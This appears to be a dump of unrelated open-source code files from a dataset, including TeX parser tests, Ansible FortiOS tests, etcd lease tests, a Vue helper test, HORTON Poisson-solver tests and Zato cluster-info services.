assert i.stretch.fil == 1, i.stretch.fil
assert i.shrink.fil == 1, i.shrink.fil
s = TeX()
s.input(r'0pt plus -1fil')
i = s.readGlue()
assert i.pt == 0, i.pt
assert i.stretch.fil == -1, i.stretch.fil
assert i.shrink is None, i.shrink
def testReadGlue2(self):
s = TeX()
s.input(r'6pt plus 2pt minus 2pt')
i = s.readGlue()
assert i.pt == 6, i.pt
assert i.stretch.pt == 2, i.stretch.pt
assert i.shrink.pt == 2, i.shrink.pt
t = TeX()
t.input(r'6pt plus 2pt minus 2pt 1.2pt plus -1.fil-1.234pt\foo')
i = t.readGlue()
j = t.readGlue()
k = t.readGlue()
# print i.source
assert i.pt == 6, i.pt
assert i.stretch.pt == 2, i.stretch.pt
assert i.shrink.pt == 2, i.shrink.pt
# print j.source
assert j.pt == 1.2, i.pt
assert j.stretch.fil == -1, j.stretch.fil
assert j.shrink is None
# print k.source
assert k.pt == -1.234, k.pt
assert k.stretch is None
assert k.shrink is None
tokens = [x for x in t.itertokens()]
assert tokens == [EscapeSequence('foo')], tokens
class Parameters(TestCase):
def testParameters(self):
t = TeX()
t.input(r'\newcount\foo\foo=\tolerance')
t.parse()
foo = t.ownerDocument.context['foo'].value
tolerance = t.ownerDocument.context['tolerance'].value
assert foo == tolerance, '"%s" != "%s"' % (foo, tolerance)
t = TeX()
t.input(r'\newcount\foo\foo=7\tolerance')
t.parse()
foo = t.ownerDocument.context['foo'].value
tolerance = t.ownerDocument.context['tolerance'].value
assert foo == (7*tolerance), '"%s" != "%s"' % (foo, 7*tolerance)
t = TeX()
t.input(r'\newcount\foo\foo=-3\tolerance')
t.parse()
foo = t.ownerDocument.context['foo'].value
tolerance = t.ownerDocument.context['tolerance'].value
assert foo == (-3*tolerance), '"%s" != "%s"' % (foo, -3*tolerance)
def testDimenParameters(self):
t = TeX()
t.input(r'\newdimen\foo\foo=\hsize')
t.parse()
foo = t.ownerDocument.context['foo'].value
hsize = t.ownerDocument.context['hsize'].value
assert foo == hsize, '"%s" != "%s"' % (foo, hsize)
t = TeX()
t.input(r'\newdimen\foo\foo=7.6\hsize')
t.parse()
foo = t.ownerDocument.context['foo'].value
hsize = t.ownerDocument.context['hsize'].value
assert foo == (7.6*hsize), '"%s" != "%s"' % (foo, 7.6*hsize)
t = TeX()
t.input(r'\newdimen\foo\foo=-4\hsize')
t.parse()
foo = t.ownerDocument.context['foo'].value
hsize = t.ownerDocument.context['hsize'].value
assert foo == (-4*hsize), '"%s" != "%s"' % (foo, (-4*hsize))
def testGlueParameters(self):
t = TeX()
t.input(r'\newskip\foo\foo=\baselineskip')
t.parse()
foo = t.ownerDocument.context['foo'].value
baselineskip = t.ownerDocument.context['baselineskip'].value
assert foo == baselineskip, '"%s" != "%s"' % (foo, baselineskip)
t = TeX()
t.input(r'\newskip\foo\foo=7.6\baselineskip')
t.parse()
foo = t.ownerDocument.context['foo'].value
baselineskip = t.ownerDocument.context['baselineskip'].value
assert foo == (7.6*baselineskip), '"%s" != "%s"' % (foo, 7.6*baselineskip)
t = TeX()
t.input(r'\newskip\foo\foo=-4\baselineskip')
t.parse()
foo = t.ownerDocument.context['foo'].value
baselineskip = t.ownerDocument.context['baselineskip'].value
assert foo == (-4*baselineskip), '"%s" != "%s"' % (foo, (-4*baselineskip))
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_router_access_list6
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_router_access_list6.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_router_access_list6_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_access_list6': {
'comments': 'test_value_3',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)
expected_data = {
'comments': 'test_value_3',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('router', 'access-list6', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_router_access_list6_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_access_list6': {
'comments': 'test_value_3',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)
expected_data = {
'comments': 'test_value_3',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('router', 'access-list6', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_router_access_list6_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'router_access_list6': {
'comments': 'test_value_3',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)
delete_method_mock.assert_called_with('router', 'access-list6', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_router_access_list6_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'router_access_list6': {
'comments': 'test_value_3',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)
delete_method_mock.assert_called_with('router', 'access-list6', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_router_access_list6_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_access_list6': {
'comments': 'test_value_3',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)
expected_data = {
'comments': 'test_value_3',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('router', 'access-list6', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_router_access_list6_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_access_list6': {
'random_attribute_not_valid': 'tag',
'comments': 'test_value_3',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)
expected_data = {
'comments': 'test_value_3',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('router', 'access-list6', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200 | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2022 The etcd Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package common
import (
"context"
"testing"
"time"
"github.com/stretchr/testify/require"
clientv3 "go.etcd.io/etcd/client/v3"
"go.etcd.io/etcd/tests/v3/framework/config"
"go.etcd.io/etcd/tests/v3/framework/testutils"
)
func TestLeaseGrantTimeToLive(t *testing.T) {
testRunner.BeforeTest(t)
for _, tc := range clusterTestCases() {
t.Run(tc.name, func(t *testing.T) {
ctx, cancel := context.WithTimeout(t.Context(), 10*time.Second)
defer cancel()
clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
defer clus.Close()
cc := testutils.MustClient(clus.Client())
testutils.ExecuteUntil(ctx, t, func() {
ttl := int64(10)
leaseResp, err := cc.Grant(ctx, ttl)
require.NoError(t, err)
ttlResp, err := cc.TimeToLive(ctx, leaseResp.ID, config.LeaseOption{})
require.NoError(t, err)
require.Equal(t, ttl, ttlResp.GrantedTTL)
})
})
}
}
func TestLeaseGrantAndList(t *testing.T) {
testRunner.BeforeTest(t)
for _, tc := range clusterTestCases() {
nestedCases := []struct {
name string
leaseCount int
}{
{
name: "no_leases",
leaseCount: 0,
},
{
name: "one_lease",
leaseCount: 1,
},
{
name: "many_leases",
leaseCount: 3,
},
}
for _, nc := range nestedCases {
t.Run(tc.name+"/"+nc.name, func(t *testing.T) {
ctx, cancel := context.WithTimeout(t.Context(), 10*time.Second)
defer cancel()
t.Logf("Creating cluster...")
clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
defer clus.Close()
cc := testutils.MustClient(clus.Client())
t.Logf("Created cluster and client")
testutils.ExecuteUntil(ctx, t, func() {
var createdLeases []clientv3.LeaseID
for i := 0; i < nc.leaseCount; i++ {
leaseResp, err := cc.Grant(ctx, 10)
t.Logf("Grant returned: resp:%s err:%v", leaseResp.String(), err)
require.NoError(t, err)
createdLeases = append(createdLeases, leaseResp.ID)
}
// Because we're not guaranteed to talk to the same member, wait for
// listing to eventually return true, either by the result propagating
// or by hitting an up to date member.
var leases []clientv3.LeaseStatus
require.Eventually(t, func() bool {
resp, err := cc.Leases(ctx)
if err != nil {
return false
}
leases = resp.Leases
// TODO: update this to use last Revision from leaseResp
// after https://github.com/etcd-io/etcd/issues/13989 is fixed
return len(leases) == len(createdLeases)
}, 2*time.Second, 10*time.Millisecond)
returnedLeases := make([]clientv3.LeaseID, 0, nc.leaseCount)
for _, status := range leases {
returnedLeases = append(returnedLeases, status.ID)
}
require.ElementsMatch(t, createdLeases, returnedLeases)
})
})
}
}
}
func TestLeaseGrantTimeToLiveExpired(t *testing.T) {
testRunner.BeforeTest(t)
for _, tc := range clusterTestCases() {
t.Run(tc.name, func(t *testing.T) {
ctx, cancel := context.WithTimeout(t.Context(), 15*time.Second)
defer cancel()
clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
defer clus.Close()
cc := testutils.MustClient(clus.Client())
testutils.ExecuteUntil(ctx, t, func() {
leaseResp, err := cc.Grant(ctx, 2)
require.NoError(t, err)
_, err = cc.Put(ctx, "foo", "bar", config.PutOptions{LeaseID: leaseResp.ID})
require.NoError(t, err)
getResp, err := cc.Get(ctx, "foo", config.GetOptions{})
require.NoError(t, err)
require.Equal(t, int64(1), getResp.Count)
// FIXME: When leader changes, old leader steps
// back to follower and ignores the lease revoking.
// The new leader will restart TTL counting. If so,
// we should call time.Sleep again and wait for revoking.
// It can't avoid flakey but reduce flakey possibility.
for i := 0; i < 3; i++ {
currentLeader := clus.WaitLeader(t)
t.Logf("[%d] current leader index %d", i, currentLeader)
time.Sleep(3 * time.Second)
newLeader := clus.WaitLeader(t)
if newLeader == currentLeader {
break
}
t.Logf("[%d] leader changed, new leader index %d", i, newLeader)
}
ttlResp, err := cc.TimeToLive(ctx, leaseResp.ID, config.LeaseOption{})
require.NoError(t, err)
require.Equal(t, int64(-1), ttlResp.TTL)
getResp, err = cc.Get(ctx, "foo", config.GetOptions{})
require.NoError(t, err)
// Value should expire with the lease
require.Equal(t, int64(0), getResp.Count)
})
})
}
}
func TestLeaseGrantKeepAliveOnce(t *testing.T) {
testRunner.BeforeTest(t)
for _, tc := range clusterTestCases() {
t.Run(tc.name, func(t *testing.T) {
ctx, cancel := context.WithTimeout(t.Context(), 15*time.Second)
defer cancel()
clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
defer clus.Close()
cc := testutils.MustClient(clus.Client())
testutils.ExecuteUntil(ctx, t, func() {
leaseResp, err := cc.Grant(ctx, 2)
require.NoError(t, err)
_, err = cc.KeepAliveOnce(ctx, leaseResp.ID)
require.NoError(t, err)
// FIXME: When leader changes, old leader steps
// back to follower and ignores the lease revoking.
// The new leader will restart TTL counting. If so,
// we should call time.Sleep again and wait for revoking.
// It can't avoid flakey but reduce flakey possibility.
for i := 0; i < 3; i++ {
currentLeader := clus.WaitLeader(t)
t.Logf("[%d] current leader index %d", i, currentLeader)
time.Sleep(2 * time.Second)
newLeader := clus.WaitLeader(t)
if newLeader == currentLeader {
break
}
t.Logf("[%d] leader changed, new leader index %d", i, newLeader)
}
ttlResp, err := cc.TimeToLive(ctx, leaseResp.ID, config.LeaseOption{})
require.NoError(t, err)
// We still have a lease!
require.Greater(t, int64(2), ttlResp.TTL)
})
})
}
}
func TestLeaseGrantRevoke(t *testing.T) {
testRunner.BeforeTest(t)
for _, tc := range clusterTestCases() {
t.Run(tc.name, func(t *testing.T) {
ctx, cancel := context.WithTimeout(t.Context(), 10*time.Second)
defer cancel()
clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
defer clus.Close()
cc := testutils.MustClient(clus.Client())
testutils.ExecuteUntil(ctx, t, func() {
leaseResp, err := cc.Grant(ctx, 20)
require.NoError(t, err)
_, err = cc.Put(ctx, "foo", "bar", config.PutOptions{LeaseID: leaseResp.ID})
require.NoError(t, err)
getResp, err := cc.Get(ctx, "foo", config.GetOptions{})
require.NoError(t, err)
require.Equal(t, int64(1), getResp.Count)
_, err = cc.Revoke(ctx, leaseResp.ID)
require.NoError(t, err)
ttlResp, err := cc.TimeToLive(ctx, leaseResp.ID, config.LeaseOption{})
require.NoError(t, err)
require.Equal(t, int64(-1), ttlResp.TTL)
getResp, err = cc.Get(ctx, "foo", config.GetOptions{})
require.NoError(t, err)
// Value should expire with the lease
require.Equal(t, int64(0), getResp.Count)
})
})
}
} | go | github | https://github.com/etcd-io/etcd | tests/common/lease_test.go |
import { toHandlers } from '../../src/helpers/toHandlers'
describe('toHandlers', () => {
it('should not accept non-objects', () => {
toHandlers(null as any)
toHandlers(undefined as any)
expect(
'v-on with no argument expects an object value.',
).toHaveBeenWarnedTimes(2)
})
it('should properly change object keys', () => {
const input = () => {}
const change = () => {}
expect(toHandlers({ input, change })).toStrictEqual({
onInput: input,
onChange: change,
})
})
}) | typescript | github | https://github.com/vuejs/core | packages/runtime-core/__tests__/helpers/toHandlers.spec.ts |
from sys import maxsize
class Contact:
def __init__(self, firstname=None, middlename=None, lastname=None, nickname=None, title=None, company=None, address=None, telhome=None, telmobile=None, telwork=None, fax=None, email=None, email2=None, email3=None, homepage=None, birth=None, anniversary=None, address2=None, home2=None, notes=None, id=None, all_phones_from_home_page=None, all_emails_from_home_page=None):
self.firstname = firstname
self.middlename = middlename
self.lastname = lastname
self.nickname = nickname
self.title = title
self.company = company
self.address = address
self.telhome = telhome
self.telmobile = telmobile
self.telwork = telwork
self.fax = fax
self.email = email
self.email2 = email2
self.email3 = email3
self.homepage = homepage
self.birth = birth
self.anniversary = anniversary
self.address2 = address2
self.home2 = home2
self.notes = notes
self.id = id
self.all_phones_from_home_page = all_phones_from_home_page
self.all_emails_from_home_page = all_emails_from_home_page
def __repr__(self):
return "%s:%s:%s" % (self.id, self.firstname, self.lastname)
def __eq__(self, other):
return (self.id is None or other.id is None or self.id == other.id) and self.firstname == other.firstname and self.lastname == other.lastname
def id_or_max(self):
if self.id:
return int(self.id)
else:
return maxsize | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handler for providing a list of files for the client to download."""
import logging
from django.utils import simplejson
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from handlers import base
CLIENT_FILE_LIST = '/client_file_list'
class ClientFileList(base.BaseHandler):
"""Handler to provide a list of files for the client to download."""
# Disable 'Invalid method name' lint error.
# pylint: disable-msg=C6409
def get(self):
"""Provides a list of files to download and execute."""
file_list = ['bots_client_bundle.zip', 'browser_install_bundle.zip',
'webdriver_content_script.js']
execution_list = ['browser_install_bundle.zip', 'bots_client_bundle.zip']
output_data = {'file_list': file_list, 'execution_list': execution_list}
self.response.out.write(simplejson.dumps(output_data))
application = webapp.WSGIApplication(
[(CLIENT_FILE_LIST, ClientFileList)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2017 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
from scipy.special import erf
import numpy as np
from nose.plugins.attrib import attr
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
@attr('slow')
def test_solve_poisson_becke_n2():
mol = IOData.from_file(context.get_fn('test/n2_hfs_sto3g.fchk'))
lmaxmax = 4
# compute hartree potential on a molecular grid
molgrid = BeckeMolGrid(mol.coordinates, mol.numbers, mol.pseudo_numbers, random_rotate=False, mode='keep')
dm_full = mol.get_dm_full()
reference = mol.obasis.compute_grid_hartree_dm(dm_full, molgrid.points)
# construct the same potential numerically with Becke's method
rho = mol.obasis.compute_grid_density_dm(dm_full, molgrid.points)
begin = 0
hds = []
for i in xrange(mol.natom):
atgrid = molgrid.subgrids[i]
end = begin + atgrid.size
becke_weights = molgrid.becke_weights[begin:end]
density_decomposition = atgrid.get_spherical_decomposition(rho[begin:end], becke_weights, lmax=lmaxmax)
hartree_decomposition = solve_poisson_becke(density_decomposition)
hds.append(hartree_decomposition)
begin = end
# Evaluate the splines obtained with Becke's method on the molecular grid
# Increasing angular momenta are used to check the convergence.
last_error = None
for lmax in xrange(0, lmaxmax+1):
result = molgrid.zeros()
for i in xrange(mol.natom):
molgrid.eval_decomposition(hds[i][:(lmax+1)**2], mol.coordinates[i], result)
potential_error = result - reference
error = molgrid.integrate(potential_error, potential_error)**0.5
if last_error is not None:
assert error < last_error
last_error = error
if False:
worst = molgrid.integrate(reference, reference)**0.5
print 'lmax=%i %12.4e %12.4e' % (lmax, error, worst)
for rho_low, rho_high in (0, 1e-8), (1e-8, 1e-4), (1e-4, 1e0), (1e0, 1e4), (1e4, 1e100):
mask = ((rho >= rho_low) & (rho < rho_high)).astype(float)
error = molgrid.integrate(potential_error, potential_error, mask)**0.5
worst = molgrid.integrate(reference, reference, mask)**0.5
print '%10.2e : %10.2e | %12.4e %12.4e' % (rho_low, rho_high, error, worst)
print
assert error < 6e-2
if False:
# Plot stuff
import matplotlib.pyplot as pt
linegrid = LineGrid(mol.coordinates[0], mol.coordinates[1], 500, 1)
rho = mol.obasis.compute_grid_density_dm(dm_full, linegrid.points)
reference = mol.obasis.compute_grid_hartree_dm(dm_full, linegrid.points)
for lmax in xrange(0, lmaxmax+1):
result = linegrid.zeros()
for i in xrange(mol.natom):
linegrid.eval_decomposition(hds[i][:(lmax+1)**2], mol.coordinates[i], result)
pt.clf()
#pt.plot(linegrid.x, reference)
#pt.plot(linegrid.x, result)
pt.plot(linegrid.x, (result - reference))
pt.ylim(-0.3, 0.3)
pt.savefig('test_poisson_%i.png' % lmax)
def test_solve_poisson_becke_sa():
sigma = 8.0
rtf = ExpRTransform(1e-4, 1e2, 500)
r = rtf.get_radii()
rhoy = np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5
rhod = np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5*(-r/sigma)/sigma
rho = CubicSpline(rhoy, rhod, rtf)
v = solve_poisson_becke([rho])[0]
s2s = np.sqrt(2)*sigma
soly = erf(r/s2s)/r
sold = np.exp(-(r/s2s)**2)*2/np.sqrt(np.pi)/s2s/r - erf(r/s2s)/r**2
if False:
import matplotlib.pyplot as pt
n = 10
pt.clf()
pt.plot(r[:n], soly[:n], label='exact')
pt.plot(r[:n], v.y[:n], label='spline')
pt.legend(loc=0)
pt.savefig('denu.png')
assert abs(v.y - soly).max()/abs(soly).max() < 1e-6
assert abs(v.dx - sold).max()/abs(sold).max() < 1e-4
# Test the boundary condition at zero and infinity
assert v.extrapolation.l == 0
np.testing.assert_allclose(v.extrapolation.amp_left, np.sqrt(2/np.pi)/sigma)
np.testing.assert_allclose(v.extrapolation.amp_right, 1.0)
def test_solve_poisson_becke_gaussian_dipole():
sigma = 8.0
rtf = ExpRTransform(1e-4, 8e1, 200)
r = rtf.get_radii()
# By deriving a Gaussian charge distribution with respect to z, we get
# rho(\mathbf{r})=Y_1^0(\Omega) rhoy, with rhoy as given below
# Note that rhoy is simply the derivative of a Gaussian charge distribution
# with respect to r.
rhoy = -r/sigma**2*np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5
rhod = (-1.0+r**2/sigma**2)/sigma**2*np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5
rho = CubicSpline(rhoy, rhod, rtf)
v = solve_poisson_becke([rho]*4)[1] # Not interested in first spline, i.e. l=0
s2s = np.sqrt(2)*sigma
# The potential corresponding to Y_1^0(\Omega), can be found by deriving
# the potential of a Gaussian charge distribution with respect to r
soly = np.exp(-(r/s2s)**2)*2/np.sqrt(np.pi)/s2s/r - erf(r/s2s)/r**2
sold = 2.0*erf(r/s2s)/r**3 - 2*2/np.sqrt(np.pi)*np.exp(-(r/s2s)**2)/s2s/r**2 - 2*2/np.sqrt(np.pi)/s2s**3*np.exp(-(r/s2s)**2)
if False:
import matplotlib.pyplot as pt
n = 200
pt.clf()
pt.plot(r[:n], -soly[:n], label='exact', marker='*')
pt.plot(r[:n], -v.y[:n], label='spline', marker='*')
r2 = np.linspace(1e-5, 2e-4, 50)
pt.plot(r2, -v(r2), label='spline eval', marker='*')
pt.xscale('log')
pt.yscale('log')
pt.legend(loc=0)
pt.savefig('poisson_gdipole.png')
assert abs(v.y - soly).max()/abs(soly).max() < 1e-6
assert abs(v.dx - sold).max()/abs(sold).max() < 1e-4
# Test the boundary condition at zero and infinity
assert v.extrapolation.l == 1
np.testing.assert_allclose(v.extrapolation.amp_left, -2.0/3.0/np.sqrt(2*np.pi)/sigma**3)
np.testing.assert_allclose(v.extrapolation.amp_right, -1.0) | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
from contextlib import closing
from json import dumps, loads
# Zato
from zato.client import AnyServiceInvoker
from zato.common import INFO_FORMAT, SERVER_JOIN_STATUS, SERVER_UP_STATUS
from zato.common.odb.query import server_list
from zato.common.component_info import format_info, get_info
from zato.server.service import Service
# ################################################################################################################################
class GetInfo(Service):
""" Like 'zato info' on command line but works across the whole cluster rather than with a single server.
"""
def handle(self):
# Let's prepare as much as we can upfront.
sec_def = self.worker_store.basic_auth_get('admin.invoke').config
channel = self.worker_store.get_channel_plain_http('admin.invoke.json')
out = {}
with closing(self.odb.session()) as session:
for item in server_list(session, self.server.cluster_id, False):
server_info = out.setdefault(item.name, {})
server_info['cluster_name'] = item.cluster_name
server_info['up_mod_date'] = item.up_mod_date.isoformat() if item.up_status == SERVER_UP_STATUS.RUNNING else None
server_info['last_join_mod_date'] = item.last_join_mod_date.isoformat() if \
item.last_join_status == SERVER_JOIN_STATUS.ACCEPTED else None
for name in 'id', 'name', 'bind_host', 'bind_port', 'last_join_status', 'last_join_mod_by', 'up_status':
server_info[name] = getattr(item, name)
if item.up_status == SERVER_UP_STATUS.RUNNING:
client = AnyServiceInvoker(
'http://{}:{}'.format(item.bind_host, item.bind_port),
channel.url_path, (sec_def.username, sec_def.password))
response = client.invoke('zato.info.get-server-info')
if response.ok:
response = loads(response.inner.text)['zato_service_invoke_response']['response'].decode('base64')
response = loads(response)['response']
server_info['info'] = loads(response['info'])
else:
self.logger.warn(response)
self.response.content_type = 'application/json'
self.response.payload = dumps(out)
class GetServerInfo(Service):
""" Collects information about a server it's invoked on.
"""
class SimpleIO(object):
output_required = ('info',)
def handle(self):
self.response.content_type = 'application/json'
self.response.payload.info = format_info(get_info(self.server.base_dir, INFO_FORMAT.JSON), INFO_FORMAT.JSON) | unknown | codeparrot/codeparrot-clean | ||
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = ""
#let {{
# class MOVMSKPS(Inst):
# "GenFault ${new UnimpInstFault}"
# class MOVMSKPD(Inst):
# "GenFault ${new UnimpInstFault}"
#}}; | unknown | codeparrot/codeparrot-clean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.